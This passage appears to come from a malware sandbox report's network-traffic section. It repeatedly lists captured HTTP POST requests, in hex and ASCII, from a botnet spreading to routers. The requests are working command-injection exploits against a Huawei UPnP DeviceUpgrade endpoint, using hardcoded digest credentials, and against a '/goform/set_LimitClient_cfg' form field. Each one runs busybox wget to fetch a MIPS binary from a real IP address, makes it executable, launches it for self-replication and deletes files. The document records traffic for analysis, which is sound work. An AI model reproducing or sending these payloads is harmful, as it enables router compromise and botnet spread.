74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
